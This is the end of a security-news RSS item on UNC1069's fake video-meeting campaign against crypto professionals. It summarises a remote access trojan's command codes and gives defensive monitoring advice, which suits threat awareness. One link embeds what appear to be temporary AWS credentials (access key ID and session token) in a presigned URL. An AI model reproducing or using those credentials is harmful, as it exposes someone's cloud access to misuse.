<p>The RAT communicates with its command-and-control server, sending host data and awaiting coded responses: code &#8220;20&#8221; triggers a secondary encrypted payload, code &#8220;21&#8221; terminates execution, and code &#8220;22&#8221; serves as a keep-alive signal.<a href="https://ppl-ai-file-upload.s3.amazonaws.com/web/direct-files/attachments/11146061/4532aa34-bf3c-4b84-b4b1-dc7b3e597672/North-Korea-Linked-UNC1069-Uses-Fake-Zoom-and-Teams-Meetings-to-Hack-Crypto-Professionals.pdf?AWSAccessKeyId=ASIA2F3EMEYEQ3HQPLKK&amp;Signature=2pXKZSPn1Ss1II2vCPUsFd4Zgog%3D&amp;x-amz-security-token=IQoJb3JpZ2luX2VjEFkaCXVzLWVhc3QtMSJHMEUCIQChZYcGJa65fit1kJX0eEhwOCPZ%2BQRSVsLrqcNhJFbkgAIgHOPhUkLUnKPQwSJ6f6ffFVSLs3XELXPiLwLRTTAuVaEq8wQIIhABGgw2OTk3NTMzMDk3MDUiDGHki311CfVOxjDFPyrQBPufR%2B%2BsS%2BpZxAMrUVWqHcaOFMpBfdMZIGp2pLc%2BzKrYprggAJ9M0%2B4OhVE29jiIJzlLD10YNz%2BhqxG60KhEMTFHuJU%2F90CZKSV3fvHatS3qpai8ByUzOXcx5mRoKpA54btgVh4ePPskHtAaxXRt4f9KUFsGWM%2Bx4%2FUU7c4kESjmG9pFowUKmy7Mp3kBmz0qm7gDCiMM7fyId7ocTbyC7UczHCllvfQGh70LzcmGCBOSu%2B8mw6fUYprMtDpp6LNfDqNqOg9xRQFjPFgDHV%2FQHa9a61%2BznPiw0zhWLFql4A0akyN%2BfwPWslI5vsFLCAg2L%2FzO0cP2Zng%2FyoQDIJ94kZuX4SR6Lec7ilfx%2Bqfp8%2FDhMMiEvv%2F1iiqvYk1qNt%2BtdIhH0GXf%2B%2FbY6xsqRvgFdl0faIVd%2BJHVkyXPq%2BG1yo9rwtbiphNI8SdOZ0tKBoKMDiUbEGNlBkP6Fdoyd2tl4%2BQb7E018W94Ii%2F27HVt1vigfkU61Rs5e0jNu578TriRAnKh%2F8N2l4%2B0v4btDYcLd1tuWRhsFZZMZgZfU8%2FmVslL6f6LlORHJ5ExHCun%2FC8KFnVoZX4O7Jze0ahNvx2MW9oWScnTfF%2FC7NCIVMCWw943qMNcilUDyO4%2FOvY8tSfFb19S80v8Mq0YYYmMD2ko58vWaaCpOY0bINEf3b%2B7rwo%2B37xVbq88nOJxH1bHxoSIn%2FSWD5dJ7ueOmvE3OgEZ07NoP0YV5kJQGyYWAhxh4UW0Fw6wJXwDHystZBcvaol3SvsSLzNYfg%2BbnxcwTMqBKwkw86qZzwY6mAFhukyI8XLmZz5rucSMbhnHM9avtKYCZI6GBTlcp8uRXI31Tao5F2B2Fa7GvSLMJx26inxpc7Q0IzGYEALXvoL2sI5gmFOWSAJ0O45hmBVwDEiYCTUpSPqmuCivl42ZQ80N0u5P3r7zh4Oj6TWbKCfCsFJypYM11OiFsQbFf0tnNALXe%2FNlaRwabMOfxXiKVDsVTR0C18Wdyw%3D%3D&amp;Expires=1776704496" target="_blank" rel="noreferrer noopener"></a></p>



<p>Security teams are advised to treat unexpected requests to run terminal commands during video calls as a serious red flag. </p>



<p>Organizations working in the cryptocurrency and Web3 space should verify the identity of meeting organizers through trusted, out-of-band channels before joining any session, and should monitor for unsigned scripts executing from temporary directories, unexpected Windows Defender exclusions, and outbound connections to domains mimicking Zoom or <a href="https://cybersecuritynews.com/google-meet-encrypted-calls/" id="63067" target="_blank" rel="noreferrer noopener">Google Meet</a> naming patterns.</p>



<p class="has-text-align-center has-background" style="background:linear-gradient(180deg,rgb(238,238,238) 91%,rgb(169,184,195) 100%)"><strong>Follow us on <a href="https://news.google.com/publications/CAAqMggKIixDQklTR3dnTWFoY0tGV041WW1WeWMyVmpkWEpwZEhsdVpYZHpMbU52YlNnQVAB?hl=en-IN&amp;gl=IN&amp;ceid=IN:en" target="_blank" rel="noreferrer noopener nofollow">Google News</a>, <a href="https://www.linkedin.com/company/cybersecurity-news/" target="_blank" rel="noreferrer noopener nofollow">LinkedIn</a>, and <a href="https://x.com/cyber_press_org" target="_blank" rel="noreferrer noopener nofollow">X</a> to Get More Instant Updates</strong>, <strong>Set CSN as a Preferred Source in <a href="https://www.google.com/preferences/source?q=cybersecuritynews.com" target="_blank" rel="noreferrer noopener nofollow">Google</a>.</strong></p>
<p>The post <a href="https://cybersecuritynews.com/north-korea-linked-unc1069-uses-fake-zoom-and-teams-meetings/">North Korea-Linked UNC1069 Uses Fake Zoom and Teams Meetings to Hack Crypto Professionals</a> appeared first on <a href="https://cybersecuritynews.com">Cyber Security News</a>.</p>
]]></content:encoded>
					
		
		
		<media:content url="https://cybersecuritynews.com/wp-content/uploads/2026/04/North-Korea-Linked-UNC1069-Uses-Fake-Zoom-and-Teams-Meetings-to-Hack-Crypto-Professionals.webp" medium="image"></media:content>
            <post-id xmlns="com-wordpress:feed-additions:1">147967</post-id>	</item>
	</channel>
</rss>
